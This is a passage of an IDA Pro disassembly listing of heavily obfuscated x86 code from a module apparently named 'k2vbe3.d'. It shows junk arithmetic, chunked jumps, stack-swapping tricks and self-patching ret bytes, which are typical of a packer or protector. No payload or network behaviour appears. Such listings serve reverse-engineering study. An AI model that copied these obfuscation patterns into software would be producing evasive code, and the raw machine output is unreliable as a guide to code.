; START	OF FUNCTION CHUNK FOR sub_4515E7

loc_44DAD4:				; CODE XREF: sub_4515E7:loc_4515F1j
		xor	edi, 4E6F7F01h
		xor	eax, edi
		pop	edi
		rol	eax, 1
		xor	eax, 0E2E9E19Eh
		rol	eax, 1Eh
		mov	ds:dword_44F64C, eax
; END OF FUNCTION CHUNK	FOR sub_4515E7
; START	OF FUNCTION CHUNK FOR sub_447692

loc_44DAEE:				; CODE XREF: sub_447692-AEC3j
					; sub_447692+49A2j
		ror	eax, 1Eh
		jmp	loc_43F4D4
; END OF FUNCTION CHUNK	FOR sub_447692

; =============== S U B	R O U T	I N E =======================================



sub_44DAF6	proc near		; DATA XREF: sub_44F49C+4AA3o

; FUNCTION CHUNK AT 0043E43F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044174C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004424E9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442FF4 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00447F60 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00449C9E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044AF23 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044C4E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CB42 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DFD1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045716D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00457793 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045843D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045ABDF SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0045B122 SIZE 00000005 BYTES

		push	0E99A988Bh
		pop	esi
		add	esi, 89258D2Ch
		cmp	esi, 0DA95E1F2h
		jmp	loc_44CB42
sub_44DAF6	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_277. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458BA9

loc_44DB0E:				; CODE XREF: sub_458BA9+11j
		jmp	loc_449DD5
; END OF FUNCTION CHUNK	FOR sub_458BA9
; ---------------------------------------------------------------------------

loc_44DB13:				; CODE XREF: k2vbe3.d:0044A386j
		jmp	loc_44AB53
; ---------------------------------------------------------------------------

loc_44DB18:				; DATA XREF: sub_43CCD0+7B89o
		add	edx, 855E8035h
		xchg	edx, [esp]
		jmp	sub_44E481

; =============== S U B	R O U T	I N E =======================================



sub_44DB26	proc near		; CODE XREF: sub_44C579:loc_451015j

; FUNCTION CHUNK AT 00457C55 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, edx
		push	offset loc_43C0C9
		jmp	loc_457C55
sub_44DB26	endp

; ---------------------------------------------------------------------------

loc_44DB33:				; CODE XREF: k2vbe3.d:loc_43CBE3j
		push	offset sub_44E8E0
		jmp	locret_43DD9A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447BE9

loc_44DB3D:				; CODE XREF: sub_447BE9+9j
		push	edx
		push	0B82F35C5h
		pop	edx
		sub	edx, 6DC6F859h
		xor	edx, 0A3A4E566h
		add	edx, ebp
		jmp	loc_443B2D
; END OF FUNCTION CHUNK	FOR sub_447BE9
; ---------------------------------------------------------------------------

loc_44DB57:				; CODE XREF: k2vbe3.d:0045A4A7j
		and	eax, ebp

; =============== S U B	R O U T	I N E =======================================



sub_44DB59	proc near		; CODE XREF: sub_45BA22+9p

var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043C617 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043E8E1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EEF9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044282C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004439B2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00443D5E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044435D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004463FF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044671E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00446ABB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446B64 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446EF8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447708 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004479E8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448E80 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004492BB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A427 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044B81A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044F9D2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045001A SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00450731 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453CE8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453FA4 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00454AAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457512 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004586B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045909B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045A16C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AFE9 SIZE 00000013 BYTES

		xchg	edx, [esp+0]
		pop	edx
		jns	loc_43C617
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_4479E8
sub_44DB59	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C745

loc_44DB71:				; CODE XREF: sub_43C745+1E824j
		sub	ecx, 0A7A446AAh
		or	ecx, 56DA077Ah
		and	ecx, 40E70866h
		push	offset sub_458046
		jmp	nullsub_402
; END OF FUNCTION CHUNK	FOR sub_43C745
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_44DB8D:				; CODE XREF: sub_43D7A9+E661j
		jge	loc_454021

loc_44DB93:				; CODE XREF: sub_43D7A9:loc_454B97j
		sub	eax, 30E67E5Fh
		push	offset sub_44C40D
		jmp	loc_43F328
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; ---------------------------------------------------------------------------

loc_44DBA3:				; CODE XREF: k2vbe3.d:00455CF9j
		not	edi
		cmp	ecx, ebp
		jmp	loc_447D44
; ---------------------------------------------------------------------------
		or	eax, 0D0D521B9h
		jmp	sub_4527CB
; ---------------------------------------------------------------------------

loc_44DBB7:				; CODE XREF: k2vbe3.d:0044D166j
		shr	ebp, 10h
		jmp	loc_451997
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EB3F

loc_44DBBF:				; CODE XREF: sub_44EB3F:loc_44D8B8j
		push	eax
		pop	edx
		xchg	edx, [esp+4+var_4]
		push	edi
		push	8218F220h
		pop	edi
		sub	edi, 0E3B6D967h
		add	edi, 61E359CFh
		jmp	loc_455A9F
; END OF FUNCTION CHUNK	FOR sub_44EB3F
; ---------------------------------------------------------------------------

locret_44DBDC:				; CODE XREF: k2vbe3.d:00456F4Dj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441632

loc_44DBDD:				; CODE XREF: sub_441632+DD8Fj
		jmp	nullsub_318
; END OF FUNCTION CHUNK	FOR sub_441632
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_44DBE2:				; CODE XREF: sub_44128B:loc_43E889j
		ror	edi, 0Bh
		jmp	loc_45C0A5
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FB73

loc_44DBEA:				; CODE XREF: sub_43FB73+E69Bj
		mov	esi, [esi]

loc_44DBEC:				; CODE XREF: sub_44F20A+93C5j
		xchg	esi, [esp+8+var_8]
		push	dword ptr [ebp+8]
		call	sub_43F75C
; END OF FUNCTION CHUNK	FOR sub_43FB73
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44DBF7:				; CODE XREF: sub_4424CF-32CAj
					; k2vbe3.d:00450047j
		jmp	loc_4529F7
; END OF FUNCTION CHUNK	FOR sub_4424CF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_27. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44DBFD:				; CODE XREF: k2vbe3.d:0044E89Fj
		jmp	loc_4503E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_44DC02:				; CODE XREF: sub_454AD4-73F1j
		jmp	loc_44CF48
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------

loc_44DC07:				; CODE XREF: k2vbe3.d:loc_44CE34j
		xor	edx, 0FF8A2603h
		rol	edx, 16h
		add	edx, 0EDFE2ED5h
		xchg	edx, [esp]
		jmp	nullsub_473
; ---------------------------------------------------------------------------
		ror	eax, 0Dh
		test	edi, 5B51653Ah
		jmp	loc_442F5E

; =============== S U B	R O U T	I N E =======================================



sub_44DC2C	proc near		; CODE XREF: sub_447EB8:loc_440911p
					; k2vbe3.d:0045A8E0j

; FUNCTION CHUNK AT 00453AFA SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	eax, ebp
		push	offset loc_45A355
		jmp	loc_453AFA
sub_44DC2C	endp

; ---------------------------------------------------------------------------

loc_44DC3C:				; DATA XREF: sub_44A2DF+B374o
		add	eax, ebp
		add	eax, 41ABDBEBh
		mov	eax, [eax]
		popf
		mov	esp, ebp
		pop	ebp
		jmp	loc_4497F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4469E1

loc_44DC4F:				; CODE XREF: sub_4469E1-A91Dj
		jz	loc_459CA0
		jmp	loc_446AC0
; END OF FUNCTION CHUNK	FOR sub_4469E1
; ---------------------------------------------------------------------------

loc_44DC5A:				; CODE XREF: k2vbe3.d:0044E9AEj
		mov	ebx, edx
		xchg	ebx, [esp]
		push	ecx
		call	sub_44C357
; START	OF FUNCTION CHUNK FOR sub_454BCE

loc_44DC65:				; CODE XREF: sub_454BCE-1C65j
		jmp	sub_4505AF
; END OF FUNCTION CHUNK	FOR sub_454BCE
; ---------------------------------------------------------------------------
		call	sub_448A7D
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_44DC6F:				; CODE XREF: sub_4575BD+Cj
		jmp	loc_447E98
; END OF FUNCTION CHUNK	FOR sub_4575BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44DC74:				; CODE XREF: sub_43CCD0+16796j
		jmp	loc_44C720
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------

loc_44DC79:				; CODE XREF: k2vbe3.d:00450BE9j
		jmp	locret_452126
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D316

loc_44DC7E:				; CODE XREF: sub_44D316-5AC3j
		jmp	loc_446828
; END OF FUNCTION CHUNK	FOR sub_44D316
; ---------------------------------------------------------------------------

loc_44DC83:				; CODE XREF: k2vbe3.d:00442786j
		jmp	sub_44EEFE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E9

loc_44DC88:				; CODE XREF: sub_4448E9+40A3j
		jnz	loc_440FE1
		adc	ebx, 9F81D22Ah
		jno	loc_45AD2B
		xchg	esi, [ecx]
		jmp	loc_440FDE
; END OF FUNCTION CHUNK	FOR sub_4448E9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_281. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44DCA2:				; CODE XREF: k2vbe3.d:loc_456DD6j
		pop	edi
		add	edi, ds:4000F2h
		rol	edi, 1Eh
		xor	edi, 6B13E44Bh
		add	edi, 4AA66ED9h
		xchg	edi, [esp]
		jmp	loc_444A73

; =============== S U B	R O U T	I N E =======================================



sub_44DCC0	proc near		; CODE XREF: k2vbe3.d:0045104Aj
					; sub_44C297+A064p

; FUNCTION CHUNK AT 0044884E SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	edi, ebp
		add	edi, 4EE9091Bh
		jmp	loc_44884E
sub_44DCC0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44DCD1:				; CODE XREF: k2vbe3.d:loc_443584j
		push	ecx
		push	7104A565h
		pop	ecx
		rol	ecx, 17h
		jnb	loc_440FAC
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_44DCE1:				; CODE XREF: sub_443F0D+1823Aj
		jmp	loc_453C34
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------

loc_44DCE6:				; CODE XREF: k2vbe3.d:00453215j
		jmp	locret_43E3D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FEF3

loc_44DCEB:				; CODE XREF: sub_44FEF3-607Cj
		jmp	nullsub_245
; END OF FUNCTION CHUNK	FOR sub_44FEF3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444966

loc_44DCF0:				; CODE XREF: sub_444966:loc_444974j
		jmp	loc_447189
; END OF FUNCTION CHUNK	FOR sub_444966

; =============== S U B	R O U T	I N E =======================================



sub_44DCF5	proc near		; DATA XREF: sub_450F71-12828o

; FUNCTION CHUNK AT 00440DDC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044378A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443F22 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00444542 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A38C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044B0E2 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044C58F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D40E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004580A2 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00458346 SIZE 00000005 BYTES

		push	0CDC0CD81h
		pop	edx
		rol	edx, 0Ch
		xor	edx, 9C1CE5D9h
		jmp	loc_4580A2
sub_44DCF5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445F6E

loc_44DD09:				; CODE XREF: sub_445F6E+14j
		mov	edx, [ebp-18h]
		add	edx, 761EFE2Fh

loc_44DD12:				; CODE XREF: sub_4529E2:loc_4599BDj
		add	edx, 89E101EDh
		mov	edx, [edx]
		add	edx, [ebp-4]
		add	eax, edx
		mov	eax, [eax]
		jmp	loc_45B1EE
; END OF FUNCTION CHUNK	FOR sub_445F6E
; ---------------------------------------------------------------------------

loc_44DD26:				; CODE XREF: k2vbe3.d:00442D8Fj
		js	sub_4467A1
		jmp	loc_4527B1

; =============== S U B	R O U T	I N E =======================================



sub_44DD31	proc near		; CODE XREF: k2vbe3.d:0044F144j
					; sub_4426DF+16817p

; FUNCTION CHUNK AT 0043D047 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043ECEE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043F22E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00440A6F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441F18 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00443453 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004453A0 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004454C4 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004460C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044896A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044E673 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004501F0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045205A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A9C5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045AE80 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045B691 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B855 SIZE 0000000A BYTES

		xchg	edx, [esp+0]
		pop	edx
		xor	esi, 95FE0849h
		sub	eax, esi
		pop	esi
		jmp	loc_4453A0
sub_44DD31	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_46. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453AE8

loc_44DD44:				; CODE XREF: sub_453AE8+7AF9j
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_453AE8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44DD49:				; CODE XREF: sub_4424CF+15D65j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_44DD4E:				; CODE XREF: sub_44ED3C+5515j
		jmp	loc_44EAD7
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507E3

loc_44DD53:				; CODE XREF: sub_4507E3:loc_44FAC7j
		jz	loc_43DCA5

loc_44DD59:				; CODE XREF: sub_4436CE+17FA6j
		jmp	loc_446519
; END OF FUNCTION CHUNK	FOR sub_4507E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_44DD5E:				; CODE XREF: sub_44B979-D344j
		jmp	loc_45C093
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
		push	0EFB0D4FFh
		jmp	loc_43DCA4
; ---------------------------------------------------------------------------

loc_44DD6D:				; CODE XREF: k2vbe3.d:0043FA50j
		xchg	eax, [esp]
		jmp	loc_44D8CE
; ---------------------------------------------------------------------------
		jmp	ds:dword_41E14C
; ---------------------------------------------------------------------------

loc_44DD7B:				; CODE XREF: k2vbe3.d:00450F24j
		jmp	loc_452A02
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_44DD80:				; CODE XREF: sub_453347-395Cj
		jmp	loc_4495F7
; END OF FUNCTION CHUNK	FOR sub_453347
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45000F

loc_44DD85:				; CODE XREF: sub_45000F-D833j
		jmp	nullsub_281
; END OF FUNCTION CHUNK	FOR sub_45000F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_227. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		add	al, 24h
		mov	edx, eax
		pop	eax
		jnz	loc_45046B
		jmp	loc_44C0CD
; ---------------------------------------------------------------------------

loc_44DD9B:				; CODE XREF: k2vbe3.d:0044CD13j
		jle	loc_44EBA0

loc_44DDA1:				; CODE XREF: k2vbe3.d:00457665j
		adc	eax, ebx

loc_44DDA3:				; CODE XREF: k2vbe3.d:loc_44CD02j
		and	ebx, 10C74DBDh
		sub	ebx, 903E6B34h
		add	ebx, 8FC2E42Bh
		xchg	ebx, [esp]
		jmp	loc_43C970
; ---------------------------------------------------------------------------

loc_44DDBD:				; CODE XREF: k2vbe3.d:00458438j
		cmp	edi, edx
		jmp	loc_440609
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44DDC4:				; CODE XREF: sub_44B912:loc_44D272j
		jnz	loc_457531
		jmp	loc_456561
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------

loc_44DDCF:				; CODE XREF: k2vbe3.d:loc_4468A0j
		push	offset sub_448FDB
		jmp	loc_456179
; ---------------------------------------------------------------------------

loc_44DDD9:				; CODE XREF: k2vbe3.d:00451785j
		test	eax, ebx
		jmp	loc_44C7BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449661

loc_44DDE0:				; CODE XREF: sub_449661:loc_454E24j
		push	edi
		mov	edi, edx
		xchg	edi, [esp+4+var_4]
		call	sub_447BE9
		mov	eax, 11C9A2C5h
		call	sub_4553CC
		push	offset loc_458644
		jmp	nullsub_176
; END OF FUNCTION CHUNK	FOR sub_449661
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_44DDFF:				; CODE XREF: sub_44E90D-3DD1j
		adc	ebx, esi
		xor	eax, 0F253427Bh
		mov	esi, edx
		jmp	loc_454129
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------
		mov	ds:dword_453D04, eax
		xor	eax, eax
		mov	[ebp-4], eax
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_44DE18:				; CODE XREF: sub_441885:loc_4409DFj
					; sub_444D7B:loc_45A9E4j
		jz	loc_44963F
		push	27A1311h
		pop	eax
		add	eax, 7BD6553Ah
		test	eax, 80000000h
		jmp	loc_45BFA4
; END OF FUNCTION CHUNK	FOR sub_444D7B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_95. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554A6

loc_44DE36:				; CODE XREF: sub_4554A6+5j
		jmp	loc_44B349
; END OF FUNCTION CHUNK	FOR sub_4554A6
; ---------------------------------------------------------------------------

loc_44DE3B:				; CODE XREF: k2vbe3.d:004489D2j
		jmp	loc_44D183
; ---------------------------------------------------------------------------

loc_44DE40:				; CODE XREF: k2vbe3.d:loc_454F38j
					; k2vbe3.d:00455A82j
		test	edx, ebp
		jmp	loc_44F6E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443916

loc_44DE47:				; CODE XREF: sub_443916:loc_45958Fj
		xchg	ebx, [esp+4+var_4]
		jmp	sub_44F49C
; END OF FUNCTION CHUNK	FOR sub_443916
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_44DE4F:				; CODE XREF: sub_4553CC-1C08j
		mov	ebx, 637378D3h
		pop	edx
; END OF FUNCTION CHUNK	FOR sub_4553CC
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_44DE55:				; CODE XREF: sub_4553CC:loc_43D9BFj
					; sub_446E24-8BDBj ...
		jb	loc_44B314
		push	0
		push	eax
		jmp	loc_44CD8F
; END OF FUNCTION CHUNK	FOR sub_446E24

; =============== S U B	R O U T	I N E =======================================



sub_44DE63	proc near		; DATA XREF: k2vbe3.d:0043DE7Eo

; FUNCTION CHUNK AT 0045798D SIZE 00000005 BYTES

		pop	ebx
		lea	eax, sub_449774
		mov	byte ptr [eax],	0C3h
		jmp	loc_45798D
sub_44DE63	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449774

loc_44DE72:				; CODE XREF: sub_449774+1j
		push	offset loc_4551E3
		jmp	nullsub_87
; END OF FUNCTION CHUNK	FOR sub_449774
; ---------------------------------------------------------------------------

loc_44DE7C:				; CODE XREF: k2vbe3.d:loc_459A1Aj
		pop	ebx
		sub	ebx, 28BFBD0Eh
		cmp	ebx, 0E46C3763h
		jmp	loc_440438
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44945C

loc_44DE8E:				; CODE XREF: sub_44945C+9D36j
		jz	loc_442F16
		jmp	loc_4441AC
; END OF FUNCTION CHUNK	FOR sub_44945C
; ---------------------------------------------------------------------------
		not	ebx
		popf
		jmp	sub_449EF8
; ---------------------------------------------------------------------------
		pop	large dword ptr	fs:0
		add	esp, 4
		or	eax, eax
		jnz	loc_4428D7
		jmp	loc_44E7BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_44DEB8:				; CODE XREF: sub_45B20A:loc_45AC48j
		jnz	loc_4521A9
		jmp	loc_442CE1
; END OF FUNCTION CHUNK	FOR sub_45B20A

; =============== S U B	R O U T	I N E =======================================



sub_44DEC3	proc near		; CODE XREF: k2vbe3.d:004494F1j
					; k2vbe3.d:004552A4p

; FUNCTION CHUNK AT 00442A0A SIZE 00000015 BYTES

		xchg	esi, [esp+0]
		pop	esi
		push	edx
		mov	edx, ebx
		xchg	edx, [esp+0]
		jmp	loc_442A0A
sub_44DEC3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44DED2:				; CODE XREF: k2vbe3.d:loc_440A74j
		and	eax, 1F1ACB35h
		xor	eax, 87E0D7DFh
		cmp	eax, 52AB5916h
		jmp	loc_449FD5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_44DEE9:				; CODE XREF: sub_43F34C-1711j
		jz	loc_45975C
		jmp	loc_44AADB
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_44DEF4:				; CODE XREF: sub_440CEA:loc_440A26j
		jnz	loc_44560A
		jmp	loc_450332
; END OF FUNCTION CHUNK	FOR sub_440CEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4505F8

loc_44DEFF:				; CODE XREF: sub_4505F8-1193Cj
		mov	esi, [ebx]
		mov	ebp, 0B545B427h
		adc	ebx, 413DE31Bh

loc_44DF0C:				; CODE XREF: sub_4505F8:loc_44EE3Fj
		push	offset loc_44A8E1
		jmp	loc_445551
; END OF FUNCTION CHUNK	FOR sub_4505F8

; =============== S U B	R O U T	I N E =======================================



sub_44DF16	proc near		; CODE XREF: k2vbe3.d:0043D00Cj
					; sub_447BE9:loc_441588p

; FUNCTION CHUNK AT 0043C9EF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DAAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E55C SIZE 0000002C BYTES
; FUNCTION CHUNK AT 00447F47 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0044B203 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E321 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452954 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00452F3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456A3B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00456B77 SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_43DAAB
		jmp	loc_44E321
sub_44DF16	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4462B1

loc_44DF29:				; CODE XREF: sub_4462B1+1Aj
		mov	edx, eax
		xchg	edx, [esp+4+var_4]

loc_44DF2E:				; CODE XREF: k2vbe3.d:0045A46Dj
		ror	eax, 0Eh
		mov	ds:dword_458BFC, eax
		jmp	nullsub_500
; END OF FUNCTION CHUNK	FOR sub_4462B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_44DF3C:				; CODE XREF: sub_448D7F+FC1Fj
		lea	eax, sub_448D7F
		mov	byte ptr [eax],	0C3h
		jmp	sub_448D7F
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------

loc_44DF4A:				; CODE XREF: k2vbe3.d:loc_4552B8j
		call	nullsub_475
		jmp	ds:dword_41E128
; ---------------------------------------------------------------------------

loc_44DF55:				; DATA XREF: sub_442DF0+4AB0o
		mov	edx, 0E5254649h
		call	sub_4432B0
		mov	ds:dword_441228, eax
; START	OF FUNCTION CHUNK FOR sub_4514E2

loc_44DF64:				; CODE XREF: k2vbe3.d:loc_445014j
					; k2vbe3.d:0044501Fj ...
		mov	esp, ebp
		jmp	loc_4568A0
; END OF FUNCTION CHUNK	FOR sub_4514E2
; ---------------------------------------------------------------------------
		cmp	eax, 0BE5FDABh
		jmp	loc_458F31
; ---------------------------------------------------------------------------

loc_44DF76:				; CODE XREF: k2vbe3.d:0044E6D6j
		jno	loc_454228
		test	edi, 18299E2h
		jmp	loc_459608
; ---------------------------------------------------------------------------
		xchg	edx, esi
		adc	edi, edx
		jmp	sub_4440CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44DF90:				; CODE XREF: sub_44B912:loc_44E407j
		add	eax, 0F2525CB1h
		mov	eax, [eax]
		call	sub_455C7A

loc_44DF9D:				; CODE XREF: k2vbe3.d:004488B2j
		jmp	sub_451CCE
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
		cmp	eax, 1F8A4279h
		jmp	loc_44AD18
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444E90

loc_44DFAD:				; CODE XREF: sub_444E90:loc_43E982j
		rol	esi, 0Eh
		add	esi, 0F2196B4h
		xor	esi, 699B2257h
		sub	esi, 0FA6A16E4h
		add	esi, 0F6FC8E81h
		xchg	esi, [esp+0]
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_444E90
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_332. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_44DFD1:				; CODE XREF: sub_44DAF6+9683j
		jmp	loc_442FF4
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45812F

loc_44DFD6:				; CODE XREF: sub_45812F-16191j
		jmp	nullsub_267
; END OF FUNCTION CHUNK	FOR sub_45812F
